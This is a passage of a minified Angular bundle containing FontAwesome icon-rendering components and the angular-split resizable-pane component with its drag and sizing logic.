Ube(){!kA||kA.disconnect()}()},watch:function(e){var i=e.observeMutationsRoot;JB?eI():GB(G8("mutationObserverCallbacks",{observeMutationsRoot:i}))}}}},{mixout:function(){return{parse:{transform:function(e){return ZB(e)}}}},hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-transform");return n&&(e.transform=ZB(n)),e}}},provides:function(a){a.generateAbstractTransformGrouping=function(e){var i=e.main,n=e.transform,c=e.iconWidth,d={transform:"translate(".concat(e.containerWidth/2," 256)")},T="translate(".concat(32*n.x,", ").concat(32*n.y,") "),k="scale(".concat(n.size/16*(n.flipX?-1:1),", ").concat(n.size/16*(n.flipY?-1:1),") "),q="rotate(".concat(n.rotate," 0 0)"),pe={outer:d,inner:{transform:"".concat(T," ").concat(k," ").concat(q)},path:{transform:"translate(".concat(c/2*-1," -256)")}};return{tag:"g",attributes:ia({},pe.outer),children:[{tag:"g",attributes:ia({},pe.inner),children:[{tag:i.icon.tag,children:i.icon.children,attributes:ia(ia({},i.icon.attributes),pe.path)}]}]}}}},{hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-mask"),r=n?wA(n.split(" ").map(function(c){return c.trim()})):{prefix:null,iconName:null,rest:[]};return r.prefix||(r.prefix=Ap()),e.mask=r,e.maskId=i.getAttribute("data-fa-mask-id"),e}}},provides:function(a){a.generateAbstractMask=function(e){var t,i=e.children,n=e.attributes,r=e.main,c=e.mask,d=e.maskId,q=r.icon,te=c.icon,pe=function cbe(t){var a=t.transform,i=t.iconWidth,n={transform:"translate(".concat(t.containerWidth/2," 256)")},r="translate(".concat(32*a.x,", ").concat(32*a.y,") "),c="scale(".concat(a.size/16*(a.flipX?-1:1),", ").concat(a.size/16*(a.flipY?-1:1),") "),d="rotate(".concat(a.rotate," 0 0)");return{outer:n,inner:{transform:"".concat(r," ").concat(c," ").concat(d)},path:{transform:"translate(".concat(i/2*-1," -256)")}}}({transform:e.transform,containerWidth:c.width,iconWidth:r.width}),Re={tag:"rect",attributes:ia(ia({},tI),{},{fill:"white"})},Fe=q.children?{children:q.children.map(eH)}:{},Ne={tag:"g",attributes:ia({},pe.inner),children:[eH(ia({tag:q.tag,attributes:ia(ia({},q.attributes),pe.path)},Fe))]},et={tag:"g",attributes:ia({},pe.outer),children:[Ne]},ut="mask-".concat(d||vb()),Ze="clip-".concat(d||vb()),yt={tag:"mask",attributes:ia(ia({},tI),{},{id:ut,maskUnits:"userSpaceOnUse",maskContentUnits:"userSpaceOnUse"}),children:[Re,et]},It={tag:"defs",children:[{tag:"clipPath",attributes:{id:Ze},children:(t=te,"g"===t.tag?t.children:[t])},yt]};return i.push(It,{tag:"rect",attributes:ia({fill:"currentColor","clip-path":"url(#".concat(Ze,")"),mask:"url(#".concat(ut,")")},tI)}),{children:i,attributes:n}}}},{provides:function(a){var e=!1;Mp.matchMedia&&(e=Mp.matchMedia("(prefers-reduced-motion: reduce)").matches),a.missingIconAbstract=function(){var i=[],n={fill:"currentColor"},r={attributeType:"XML",repeatCount:"indefinite",dur:"2s"};i.push({tag:"path",attributes:ia(ia({},n),{},{d:"M156.5,447.7l-12.6,29.5c-18.7-9.5-35.9-21.2-51.5-34.9l22.7-22.7C127.6,430.5,141.5,440,156.5,447.7z M40.6,272H8.5 c1.4,21.2,5.4,41.7,11.7,61.1L50,321.2C45.1,305.5,41.8,289,40.6,272z M40.6,240c1.4-18.8,5.2-37,11.1-54.1l-29.5-12.6 C14.7,194.3,10,216.7,8.5,240H40.6z M64.3,156.5c7.8-14.9,17.2-28.8,28.1-41.5L69.7,92.3c-13.7,15.6-25.5,32.8-34.9,51.5 L64.3,156.5z M397,419.6c-13.9,12-29.4,22.3-46.1,30.4l11.9,29.8c20.7-9.9,39.8-22.6,56.9-37.6L397,419.6z M115,92.4 c13.9-12,29.4-22.3,46.1-30.4l-11.9-29.8c-20.7,9.9-39.8,22.6-56.8,37.6L115,92.4z M447.7,355.5c-7.8,14.9-17.2,28.8-28.1,41.5 l22.7,22.7c13.7-15.6,25.5-32.9,34.9-51.5L447.7,355.5z M471.4,272c-1.4,18.8-5.2,37-11.1,54.1l29.5,12.6 c7.5-21.1,12.2-43.5,13.6-66.8H471.4z M321.2,462c-15.7,5-32.2,8.2-49.2,9.4v32.1c21.2-1.4,41.7-5.4,61.1-11.7L321.2,462z M240,471.4c-18.8-1.4-37-5.2-54.1-11.1l-12.6,29.5c21.1,7.5,43.5,12.2,66.8,13.6V471.4z M462,190.8c5,15.7,8.2,32.2,9.4,49.2h32.1 c-1.4-21.2-5.4-41.7-11.7-61.1L462,190.8z M92.4,397c-12-13.9-22.3-29.4-30.4-46.1l-29.8,11.9c9.9,20.7,22.6,39.8,37.6,56.9 L92.4,397z M272,40.6c18.8,1.4,36.9,5.2,54.1,11.1l12.6-29.5C317.7,14.7,295.3,10,272,8.5V40.6z M190.8,50 c15.7-5,32.2-8.2,49.2-9.4V8.5c-21.2,1.4-41.7,5.4-61.1,11.7L190.8,50z M442.3,92.3L419.6,115c12,13.9,22.3,29.4,30.5,46.1 l29.8-11.9C470,128.5,457.3,109.4,442.3,92.3z M397,92.4l22.7-22.7c-15.6-13.7-32.8-25.5-51.5-34.9l-12.6,29.5 C370.4,72.1,384.4,81.5,397,92.4z"})});var c=ia(ia({},r),{},{attributeName:"opacity"}),d={tag:"circle",attributes:ia(ia({},n),{},{cx:"256",cy:"364",r:"28"}),children:[]};return e||d.children.push({tag:"animate",attributes:ia(ia({},r),{},{attributeName:"r",values:"28;14;28;28;14;28;"})},{tag:"animate",attributes:ia(ia({},c),{},{values:"1;0;1;1;0;1;"})}),i.push(d),i.push({tag:"path",attributes:ia(ia({},n),{},{opacity:"1",d:"M263.7,312h-16c-6.6,0-12-5.4-12-12c0-71,77.4-63.9,77.4-107.8c0-20-17.8-40.2-57.4-40.2c-29.1,0-44.3,9.6-59.2,28.7 c-3.9,5-11.1,6-16.2,2.4l-13.1-9.2c-5.6-3.9-6.9-11.8-2.6-17.2c21.2-27.2,46.4-44.7,91.2-44.7c52.3,0,97.4,29.8,97.4,80.2 c0,67.6-77.4,63.5-77.4,107.8C275.7,306.6,270.3,312,263.7,312z"}),children:e?[]:[{tag:"animate",attributes:ia(ia({},c),{},{values:"1;0;0;0;0;1;"})}]}),e||i.push({tag:"path",attributes:ia(ia({},n),{},{opacity:"0",d:"M232.5,134.5l7,168c0.3,6.4,5.6,11.5,12,11.5h9c6.4,0,11.7-5.1,12-11.5l7-168c0.3-6.8-5.2-12.5-12-12.5h-23 C237.7,122,232.2,127.7,232.5,134.5z"}),children:[{tag:"animate",attributes:ia(ia({},c),{},{values:"0;0;1;1;0;0;"})}]}),{tag:"g",attributes:{class:"missing"},children:i}}}},{hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-symbol");return e.symbol=null!==n&&(""===n||n),e}}}}],{mixoutsTo:Ql});var fMe=Ql.parse,pMe=Ql.icon;const _Me=["*"],yMe=t=>{const a={"fa-spin":t.spin,"fa-pulse":t.pulse,"fa-fw":t.fixedWidth,"fa-border":t.border,"fa-inverse":t.inverse,"fa-layers-counter":t.counter,"fa-flip-horizontal":"horizontal"===t.flip||"both"===t.flip,"fa-flip-vertical":"vertical"===t.flip||"both"===t.flip,[`fa-${t.size}`]:null!==t.size,[`fa-rotate-${t.rotate}`]:null!==t.rotate,[`fa-pull-${t.pull}`]:null!==t.pull,[`fa-stack-${t.stackItemSize}`]:null!=t.stackItemSize};return Object.keys(a).map(e=>a[e]?e:null).filter(e=>e)};let vMe=(()=>{class t{constructor(){this.defaultPrefix="fas",this.fallbackIcon=null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),AMe=(()=>{class t{constructor(){this.definitions={}}addIcons(...e){for(const i of e){i.prefix in this.definitions||(this.definitions[i.prefix]={}),this.definitions[i.prefix][i.iconName]=i;for(const n of i.icon[2])"string"==typeof n&&(this.definitions[i.prefix][n]=i)}}addIconPacks(...e){for(const i of e){const n=Object.keys(i).map(r=>i[r]);this.addIcons(...n)}}getIconDefinition(e,i){return e in this.definitions&&i in this.definitions[e]?this.definitions[e][i]:null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),TMe=(()=>{class t{constructor(){this.stackItemSize="1x"}ngOnChanges(e){if("size"in e)throw new Error('fa-icon is not allowed to customize size when used inside fa-stack. Set size on the enclosing fa-stack instead: <fa-stack size="4x">...</fa-stack>.')}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["fa-icon","stackItemSize",""],["fa-duotone-icon","stackItemSize",""]],inputs:{stackItemSize:"stackItemSize",size:"size"},features:[sa]}),t})(),EMe=(()=>{class t{constructor(e,i){this.renderer=e,this.elementRef=i}ngOnInit(){this.renderer.addClass(this.elementRef.nativeElement,"fa-stack")}ngOnChanges(e){"size"in e&&(null!=e.size.currentValue&&this.renderer.addClass(this.elementRef.nativeElement,`fa-${e.size.currentValue}`),null!=e.size.previousValue&&this.renderer.removeClass(this.elementRef.nativeElement,`fa-${e.size.previousValue}`))}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["fa-stack"]],inputs:{size:"size"},features:[sa],ngContentSelectors:_Me,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2}),t})(),tH=(()=>{class t{constructor(e,i,n,r,c){this.sanitizer=e,this.config=i,this.iconLibrary=n,this.stackItem=r,this.classes=[],null!=c&&null==r&&console.error('FontAwesome: fa-icon and fa-duotone-icon elements must specify stackItemSize attribute when wrapped into fa-stack. Example: <fa-icon stackItemSize="2x"></fa-icon>.')}ngOnChanges(e){if(null==this.icon&&null==this.config.fallbackIcon)return(()=>{throw new Error("Property `icon` is required for `fa-icon`/`fa-duotone-icon` components.")})();let i=null;if(i=null==this.icon?this.config.fallbackIcon:this.icon,e){const n=this.findIconDefinition(i);if(null!=n){const r=this.buildParams();this.renderIcon(n,r)}}}render(){this.ngOnChanges({})}findIconDefinition(e){const i=((t,a)=>(t=>void 0!==t.prefix&&void 0!==t.iconName)(t)?t:Array.isArray(t)&&2===t.length?{prefix:t[0],iconName:t[1]}:"string"==typeof t?{prefix:a,iconName:t}:void 0)(e,this.config.defaultPrefix);if("icon"in i)return i;const n=this.iconLibrary.getIconDefinition(i.prefix,i.iconName);return null!=n?n:((t=>{throw new Error(`Could not find icon with iconName=${t.iconName} and prefix=${t.prefix} in the icon library.`)})(i),null)}buildParams(){const e={flip:this.flip,spin:this.spin,pulse:this.pulse,border:this.border,inverse:this.inverse,size:this.size||null,pull:this.pull||null,rotate:this.rotate||null,fixedWidth:"boolean"==typeof this.fixedWidth?this.fixedWidth:this.config.fixedWidth,stackItemSize:null!=this.stackItem?this.stackItem.stackItemSize:null},i="string"==typeof this.transform?fMe.transform(this.transform):this.transform;return{title:this.title,transform:i,classes:[...yMe(e),...this.classes],mask:null!=this.mask?this.findIconDefinition(this.mask):null,styles:null!=this.styles?this.styles:{},symbol:this.symbol,attributes:{role:this.a11yRole}}}renderIcon(e,i){const n=pMe(e,i);this.renderedIconHTML=this.sanitizer.bypassSecurityTrustHtml(n.html.join("\n"))}}return t.\u0275fac=function(e){return new(e||t)(Ee(cy),Ee(vMe),Ee(AMe),Ee(TMe,8),Ee(EMe,8))},t.\u0275cmp=Wt({type:t,selectors:[["fa-icon"]],hostAttrs:[1,"ng-fa-icon"],hostVars:2,hostBindings:function(e,i){2&e&&(Gs("innerHTML",i.renderedIconHTML,Uc),Rt("title",i.title))},inputs:{icon:"icon",title:"title",spin:"spin",pulse:"pulse",mask:"mask",styles:"styles",flip:"flip",size:"size",pull:"pull",border:"border",inverse:"inverse",symbol:"symbol",rotate:"rotate",fixedWidth:"fixedWidth",classes:"classes",transform:"transform",a11yRole:"a11yRole"},features:[sa],decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})(),iH=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const DMe=["gutterEls"];function xMe(t,a){if(1&t){const e=Ye();m(0,"div",2,3),he("keydown",function(n){be(e);const r=B().index;return Me(B().startKeyboardDrag(n,2*r+1,r+1))})("mousedown",function(n){be(e);const r=B().index;return Me(B().startMouseDrag(n,2*r+1,r+1))})("touchstart",function(n){be(e);const r=B().index;return Me(B().startMouseDrag(n,2*r+1,r+1))})("mouseup",function(n){be(e);const r=B().index;return Me(B().clickGutter(n,r+1))})("touchend",function(n){be(e);const r=B().index;return Me(B().clickGutter(n,r+1))}),it(2,"div",4),u()}if(2&t){const e=B(),i=e.index,n=e.$implicit,r=B();ri("flex-basis",r.gutterSize,"px")("order",2*i+1),Rt("aria-label",r.gutterAriaLabel)("aria-orientation",r.direction)("aria-valuemin",n.minSize)("aria-valuemax",n.maxSize)("aria-valuenow",n.size)("aria-valuetext",r.getAriaAreaSizeText(n.size))}}function wMe(t,a){1&t&&ne(0,xMe,3,10,"div",1),2&t&&V("ngIf",!1===a.last)}const IMe=["*"];function Eb(t){if(void 0!==t.changedTouches&&t.changedTouches.length>0)return{x:t.changedTouches[0].clientX,y:t.changedTouches[0].clientY};if(void 0!==t.clientX&&void 0!==t.clientY)return{x:t.clientX,y:t.clientY};if(void 0!==t.currentTarget){const a=t.currentTarget;return{x:a.offsetLeft,y:a.offsetTop}}return null}function aH(t,a,e){return Math.abs(t.x-a.x)<=e&&Math.abs(t.y-a.y)<=e}function nH(t,a){const e=t.nativeElement.getBoundingClientRect();return"horizontal"===a?e.width:e.height}function Db(t){return"boolean"==typeof t?t:"false"!==t}function Ep(t,a){return null==t?a:(t=Number(t),!isNaN(t)&&t>=0?t:a)}function oH(t,a){if("percent"===t){const e=a.reduce((i,n)=>null!==n?i+n:i,0);return a.every(i=>null!==i)&&e>99.9&&e<100.1}if("pixel"===t)return 1===a.filter(e=>null===e).length}function PA(t){return null===t.size?null:!0===t.component.lockSize?t.size:null===t.component.minSize?null:t.component.minSize>t.size?t.size:t.component.minSize}function OA(t){return null===t.size?null:!0===t.component.lockSize?t.size:null===t.component.maxSize?null:t.component.maxSize<t.size?t.size:t.component.maxSize}function X1(t,a,e,i){return a.reduce((n,r)=>{const c=function SMe(t,a,e,i){return 0===e?{areaSnapshot:a,pixelAbsorb:0,percentAfterAbsorption:a.sizePercentAtStart,pixelRemain:0}:0===a.sizePixelAtStart&&e<0?{areaSnapshot:a,pixelAbsorb:0,percentAfterAbsorption:0,pixelRemain:e}:"percent"===t?function kMe(t,a,e){const n=(t.sizePixelAtStart+a)/e*100;if(a>0){if(null!==t.area.maxSize&&n>t.area.maxSize){const r=t.area.maxSize/100*e;return{areaSnapshot:t,pixelAbsorb:r,percentAfterAbsorption:t.area.maxSize,pixelRemain:t.sizePixelAtStart+a-r}}return{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:n>100?100:n,pixelRemain:0}}if(a<0){if(null!==t.area.minSize&&n<t.area.minSize){const r=t.area.minSize/100*e;return{areaSnapshot:t,pixelAbsorb:r,percentAfterAbsorption:t.area.minSize,pixelRemain:t.sizePixelAtStart+a-r}}return n<0?{areaSnapshot:t,pixelAbsorb:-t.sizePixelAtStart,percentAfterAbsorption:0,pixelRemain:a+t.sizePixelAtStart}:{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:n,pixelRemain:0}}}(a,e,i):"pixel"===t?function PMe(t,a,e){const i=t.sizePixelAtStart+a;return a>0?null!==t.area.maxSize&&i>t.area.maxSize?{areaSnapshot:t,pixelAbsorb:t.area.maxSize-t.sizePixelAtStart,percentAfterAbsorption:-1,pixelRemain:i-t.area.maxSize}:{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:-1,pixelRemain:0}:a<0?null!==t.area.minSize&&i<t.area.minSize?{areaSnapshot:t,pixelAbsorb:t.area.minSize+a-i,percentAfterAbsorption:-1,pixelRemain:i-t.area.minSize}:i<0?{areaSnapshot:t,pixelAbsorb:-t.sizePixelAtStart,percentAfterAbsorption:-1,pixelRemain:a+t.sizePixelAtStart}:{areaSnapshot:t,pixelAbsorb:a,percentAfterAbsorption:-1,pixelRemain:0}:void 0}(a,e):void 0}(t,r,n.remain,i);return n.list.push(c),n.remain=c.pixelRemain,n},{remain:e,list:[]})}function rH(t,a){"percent"===t?a.areaSnapshot.area.size=a.percentAfterAbsorption:"pixel"===t&&null!==a.areaSnapshot.area.size&&(a.areaSnapshot.area.size=a.areaSnapshot.sizePixelAtStart+a.pixelAbsorb)}const OMe=new ni("angular-split-global-config");let Zh=(()=>{class t{constructor(e,i,n,r,c){this.ngZone=e,this.elRef=i,this.cdRef=n,this.renderer=r,this.gutterClickDeltaPx=2,this._config={direction:"horizontal",unit:"percent",gutterSize:11,gutterStep:1,restrictMove:!1,useTransition:!1,disabled:!1,dir:"ltr",gutterDblClickDuration:0},this.dragStart=new Tt(!1),this.dragEnd=new Tt(!1),this.gutterClick=new Tt(!1),this.gutterDblClick=new Tt(!1),this.dragProgressSubject=new J,this.dragProgress$=this.dragProgressSubject.asObservable(),this.isDragging=!1,this.isWaitingClear=!1,this.isWaitingInitialMove=!1,this.dragListeners=[],this.snapshot=null,this.startPoint=null,this.endPoint=null,this.displayedAreas=[],this.hiddenAreas=[],this._clickTimeout=null,this.direction=this._direction,this._config=c?Object.assign(this._config,c):this._config,Object.keys(this._config).forEach(d=>{this[d]=this._config[d]})}set direction(e){this._direction="vertical"===e?"vertical":"horizontal",this.renderer.addClass(this.elRef.nativeElement,`as-${this._direction}`),this.renderer.removeClass(this.elRef.nativeElement,"as-"+("vertical"===this._direction?"horizontal":"vertical")),this.build(!1,!1)}get direction(){return this._direction}set unit(e){this._unit="pixel"===e?"pixel":"percent",this.renderer.addClass(this.elRef.nativeElement,`as-${this._unit}`),this.renderer.removeClass(this.elRef.nativeElement,"as-"+("pixel"===this._unit?"percent":"pixel")),this.build(!1,!0)}get unit(){return this._unit}set gutterSize(e){this._gutterSize=Ep(e,11),this.build(!1,!1)}get gutterSize(){return this._gutterSize}set gutterStep(e){this._gutterStep=Ep(e,1)}get gutterStep(){return this._gutterStep}set restrictMove(e){this._restrictMove=Db(e)}get restrictMove(){return this._restrictMove}set useTransition(e){this._useTransition=Db(e),this._useTransition?this.renderer.addClass(this.elRef.nativeElement,"as-transition"):this.renderer.removeClass(this.elRef.nativeElement,"as-transition")}get useTransition(){return this._useTransition}set disabled(e){this._disabled=Db(e),this._disabled?this.renderer.addClass(this.elRef.nativeElement,"as-disabled"):this.renderer.removeClass(this.elRef.nativeElement,"as-disabled")}get disabled(){return this._disabled}set dir(e){this._dir="rtl"===e?"rtl":"ltr",this.renderer.setAttribute(this.elRef.nativeElement,"dir",this._dir)}get dir(){return this._dir}set gutterDblClickDuration(e){this._gutterDblClickDuration=Ep(e,0)}get gutterDblClickDuration(){return this._gutterDblClickDuration}get transitionEnd(){return new G(e=>this.transitionEndSubscriber=e).pipe(lp(20))}ngAfterViewInit(){this.ngZone.runOutsideAngular(()=>{setTimeout(()=>this.renderer.addClass(this.elRef.nativeElement,"as-init"))})}getNbGutters(){return 0===this.displayedAreas.length?0:this.displayedAreas.length-1}addArea(e){const i={component:e,order:0,size:0,minSize:null,maxSize:null,sizeBeforeCollapse:null,gutterBeforeCollapse:0};!0===e.visible?(this.displayedAreas.push(i),this.build(!0,!0)):this.hiddenAreas.push(i)}removeArea(e){if(this.displayedAreas.some(i=>i.component===e)){const i=this.displayedAreas.find(n=>n.component===e);this.displayedAreas.splice(this.displayedAreas.indexOf(i),1),this.build(!0,!0)}else if(this.hiddenAreas.some(i=>i.component===e)){const i=this.hiddenAreas.find(n=>n.component===e);this.hiddenAreas.splice(this.hiddenAreas.indexOf(i),1)}}updateArea(e,i,n){!0===e.visible&&this.build(i,n)}showArea(e){const i=this.hiddenAreas.find(r=>r.component===e);if(void 0===i)return;const n=this.hiddenAreas.splice(this.hiddenAreas.indexOf(i),1);this.displayedAreas.push(...n),this.build(!0,!0)}hideArea(e){const i=this.displayedAreas.find(r=>r.component===e);if(void 0===i)return;const n=this.displayedAreas.splice(this.displayedAreas.indexOf(i),1);n.forEach(r=>{r.order=0,r.size=0}),this.hiddenAreas.push(...n),this.build(!0,!0)}getVisibleAreaSizes(){return this.displayedAreas.map(e=>null===e.size?"*":e.size)}setVisibleAreaSizes(e){if(e.length!==this.displayedAreas.length)return!1;const i=e.map(r=>Ep(r,null));return!1!==oH(this.unit,i)&&(this.displayedAreas.forEach((r,c)=>r.component._size=i[c]),this.build(!1,!0),!0)}build(e,i){if(this.stopDragging(),!0===e&&(this.displayedAreas.every(n=>null!==n.component.order)&&this.displayedAreas.sort((n,r)=>n.component.order-r.component.order),this.displayedAreas.forEach((n,r)=>{n.order=2*r,n.component.setStyleOrder(n.order)})),!0===i){const n=oH(this.unit,this.displayedAreas.map(r=>r.component.size));switch(this.unit){case"percent":{const r=100/this.displayedAreas.length;this.displayedAreas.forEach(c=>{c.size=n?c.component.size:r,c.minSize=PA(c),c.maxSize=OA(c)});break}case"pixel":if(n)this.displayedAreas.forEach(r=>{r.size=r.component.size,r.minSize=PA(r),r.maxSize=OA(r)});else{const r=this.displayedAreas.filter(c=>null===c.component.size);if(0===r.length&&this.displayedAreas.length>0)this.displayedAreas.forEach((c,d)=>{c.size=0===d?null:c.component.size,c.minSize=0===d?null:PA(c),c.maxSize=0===d?null:OA(c)});else if(r.length>1){let c=!1;this.displayedAreas.forEach(d=>{null===d.component.size?!1===c?(d.size=null,d.minSize=null,d.maxSize=null,c=!0):(d.size=100,d.minSize=null,d.maxSize=null):(d.size=d.component.size,d.minSize=PA(d),d.maxSize=OA(d))})}}}}this.refreshStyleSizes(),this.cdRef.markForCheck()}refreshStyleSizes(){if("percent"===this.unit)if(1===this.displayedAreas.length)this.displayedAreas[0].component.setStyleFlex(0,0,"100%",!1,!1);else{const e=this.getNbGutters()*this.gutterSize;this.displayedAreas.forEach(i=>{i.component.setStyleFlex(0,0,`calc( ${i.size}% - ${i.size/100*e}px )`,null!==i.minSize&&i.minSize===i.size,null!==i.maxSize&&i.maxSize===i.size)})}else"pixel"===this.unit&&this.displayedAreas.forEach(e=>{null===e.size?e.component.setStyleFlex(1,1,1===this.displayedAreas.length?"100%":"auto",!1,!1):1===this.displayedAreas.length?e.component.setStyleFlex(0,0,"100%",!1,!1):e.component.setStyleFlex(0,0,`${e.size}px`,null!==e.minSize&&e.minSize===e.size,null!==e.maxSize&&e.maxSize===e.size)})}clickGutter(e,i){const n=Eb(e);this.startPoint&&aH(this.startPoint,n,this.gutterClickDeltaPx)&&(!this.isDragging||this.isWaitingInitialMove)&&(null!==this._clickTimeout?(window.clearTimeout(this._clickTimeout),this._clickTimeout=null,this.notify("dblclick",i),this.stopDragging()):this._clickTimeout=window.setTimeout(()=>{this._clickTimeout=null,this.notify("click",i),this.stopDragging()},this.gutterDblClickDuration))}startKeyboardDrag(e,i,n){if(!0===this.disabled||!0===this.isWaitingClear)return;const r=function RMe(t,a){if("horizontal"===a)switch(t.key){case"ArrowLeft":case"ArrowRight":case"PageUp":case"PageDown":break;default:return null}if("vertical"===a)switch(t.key){case"ArrowUp":case"ArrowDown":case"PageUp":case"PageDown":break;default:return null}const e=t.currentTarget,i="PageUp"===t.key||"PageDown"===t.key?500:50;let n=e.offsetLeft,r=e.offsetTop;switch(t.key){case"ArrowLeft":n-=i;break;case"ArrowRight":n+=i;break;case"ArrowUp":r-=i;break;case"ArrowDown":r+=i;break;case"PageUp":"vertical"===a?r-=i:n+=i;break;case"PageDown":"vertical"===a?r+=i:n-=i;break;default:return null}return{x:n,y:r}}(e,this.direction);null!==r&&(this.endPoint=r,this.startPoint=Eb(e),e.preventDefault(),e.stopPropagation(),this.setupForDragEvent(i,n),this.startDragging(),this.drag(),this.stopDragging())}startMouseDrag(e,i,n){e.preventDefault(),e.stopPropagation(),this.startPoint=Eb(e),null!==this.startPoint&&!0!==this.disabled&&!0!==this.isWaitingClear&&(this.setupForDragEvent(i,n),this.dragListeners.push(this.renderer.listen("document","mouseup",this.stopDragging.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchend",this.stopDragging.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchcancel",this.stopDragging.bind(this))),this.ngZone.runOutsideAngular(()=>{this.dragListeners.push(this.renderer.listen("document","mousemove",this.mouseDragEvent.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchmove",this.mouseDragEvent.bind(this)))}),this.startDragging())}setupForDragEvent(e,i){this.snapshot={gutterNum:i,lastSteppedOffset:0,allAreasSizePixel:nH(this.elRef,this.direction)-this.getNbGutters()*this.gutterSize,allInvolvedAreasSizePercent:100,areasBeforeGutter:[],areasAfterGutter:[]},this.displayedAreas.forEach(n=>{const r={area:n,sizePixelAtStart:nH(n.component.elRef,this.direction),sizePercentAtStart:"percent"===this.unit?n.size:-1};n.order<e?!0===this.restrictMove?this.snapshot.areasBeforeGutter=[r]:this.snapshot.areasBeforeGutter.unshift(r):n.order>e&&(!0===this.restrictMove?0===this.snapshot.areasAfterGutter.length&&(this.snapshot.areasAfterGutter=[r]):this.snapshot.areasAfterGutter.push(r))}),this.snapshot.allInvolvedAreasSizePercent=[...this.snapshot.areasBeforeGutter,...this.snapshot.areasAfterGutter].reduce((n,r)=>n+r.sizePercentAtStart,0)}startDragging(){this.displayedAreas.forEach(e=>e.component.lockEvents()),this.isDragging=!0,this.isWaitingInitialMove=!0}mouseDragEvent(e){e.preventDefault(),e.stopPropagation();const i=Eb(e);null!==this._clickTimeout&&!aH(this.startPoint,i,this.gutterClickDeltaPx)&&(window.clearTimeout(this._clickTimeout),this._clickTimeout=null),!1!==this.isDragging&&(this.endPoint=Eb(e),null!==this.endPoint&&this.drag())}drag(){if(this.isWaitingInitialMove){if(this.startPoint.x===this.endPoint.x&&this.startPoint.y===this.endPoint.y)return;this.ngZone.run(()=>{this.isWaitingInitialMove=!1,this.renderer.addClass(this.elRef.nativeElement,"as-dragging"),this.renderer.addClass(this.gutterEls.toArray()[this.snapshot.gutterNum-1].nativeElement,"as-dragged"),this.notify("start",this.snapshot.gutterNum)})}let e="horizontal"===this.direction?this.startPoint.x-this.endPoint.x:this.startPoint.y-this.endPoint.y;"rtl"===this.dir&&(e=-e);const i=Math.round(e/this.gutterStep)*this.gutterStep;if(i===this.snapshot.lastSteppedOffset)return;this.snapshot.lastSteppedOffset=i;let n=X1(this.unit,this.snapshot.areasBeforeGutter,-i,this.snapshot.allAreasSizePixel),r=X1(this.unit,this.snapshot.areasAfterGutter,i,this.snapshot.allAreasSizePixel);if(0!==n.remain&&0!==r.remain?Math.abs(n.remain)===Math.abs(r.remain)||(Math.abs(n.remain)>Math.abs(r.remain)?r=X1(this.unit,this.snapshot.areasAfterGutter,i+n.remain,this.snapshot.allAreasSizePixel):n=X1(this.unit,this.snapshot.areasBeforeGutter,-(i-r.remain),this.snapshot.allAreasSizePixel)):0!==n.remain?r=X1(this.unit,this.snapshot.areasAfterGutter,i+n.remain,this.snapshot.allAreasSizePixel):0!==r.remain&&(n=X1(this.unit,this.snapshot.areasBeforeGutter,-(i-r.remain),this.snapshot.allAreasSizePixel)),"percent"===this.unit){const c=[...n.list,...r.list],d=c.find(T=>0!==T.percentAfterAbsorption&&T.percentAfterAbsorption!==T.areaSnapshot.area.minSize&&T.percentAfterAbsorption!==T.areaSnapshot.area.maxSize);d&&(d.percentAfterAbsorption=this.snapshot.allInvolvedAreasSizePercent-c.filter(T=>T!==d).reduce((T,k)=>T+k.percentAfterAbsorption,0))}n.list.forEach(c=>rH(this.unit,c)),r.list.forEach(c=>rH(this.unit,c)),this.refreshStyleSizes(),this.notify("progress",this.snapshot.gutterNum)}stopDragging(e){if(e&&(e.preventDefault(),e.stopPropagation()),!1!==this.isDragging){for(this.displayedAreas.forEach(i=>i.component.unlockEvents());this.dragListeners.length>0;){const i=this.dragListeners.pop();i&&i()}this.isDragging=!1,!1===this.isWaitingInitialMove&&this.notify("end",this.snapshot.gutterNum),this.renderer.removeClass(this.elRef.nativeElement,"as-dragging"),this.renderer.removeClass(this.gutterEls.toArray()[this.snapshot.gutterNum-1].nativeElement,"as-dragged"),this.snapshot=null,this.isWaitingClear=!0,this.ngZone.runOutsideAngular(()=>{setTimeout(()=>{this.startPoint=null,this.endPoint=null,this.isWaitingClear=!1})})}}notify(e,i){const n=this.getVisibleAreaSizes();"start"===e?this.dragStart.emit({gutterNum:i,sizes:n}):"end"===e?this.dragEnd.emit({gutterNum:i,sizes:n}):"click"===e?this.gutterClick.emit({gutterNum:i,sizes:n}):"dblclick"===e?this.gutterDblClick.emit({gutterNum:i,sizes:n}):"transitionEnd"===e?this.transitionEndSubscriber&&this.ngZone.run(()=>this.transitionEndSubscriber.next(n)):"progress"===e&&this.dragProgressSubject.next({gutterNum:i,sizes:n})}ngOnDestroy(){this.stopDragging()}collapseArea(e,i,n){const r=this.displayedAreas.find(T=>T.component===e);if(void 0===r)return;const c="right"===n?1:-1;r.sizeBeforeCollapse||(r.sizeBeforeCollapse=r.size,r.gutterBeforeCollapse=c),r.size=i;const d=this.gutterEls.find(T=>T.nativeElement.style.order===`${r.order+c}`);d&&this.renderer.addClass(d.nativeElement,"as-split-gutter-collapsed"),this.updateArea(e,!1,!1)}expandArea(e){const i=this.displayedAreas.find(r=>r.component===e);if(void 0===i||!i.sizeBeforeCollapse)return;i.size=i.sizeBeforeCollapse,i.sizeBeforeCollapse=null;const 